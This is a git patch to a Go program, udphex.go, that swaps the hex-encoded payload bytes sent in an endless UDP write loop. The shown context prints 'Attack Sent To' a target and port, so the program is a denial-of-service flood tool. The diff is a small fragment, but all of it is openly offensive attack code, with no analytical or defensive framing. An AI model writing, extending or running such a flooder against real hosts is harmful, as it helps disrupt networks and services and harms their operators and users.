From 854777177599d01ff71996aca83c6afa3ee36f90 Mon Sep 17 00:00:00 2001 From: Fijxu Date: Thu, 29 Apr 2021 23:02:00 -0400 Subject: [PATCH] Change the shit hex message --- udphex.go | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/udphex.go b/udphex.go index d8f438e..122accd 100644 --- a/udphex.go +++ b/udphex.go @@ -15,7 +15,7 @@ func main() { } else { fmt.Println("Attack Sent To " + target + " Using Port " + port + " With udphex!") for { - conn.Write([]byte("\x64\x72\x61\x63\x6f\x73\x75\x64\x70\x68\x65\x78")) + conn.Write([]byte("\x61\x73\x64")) } } }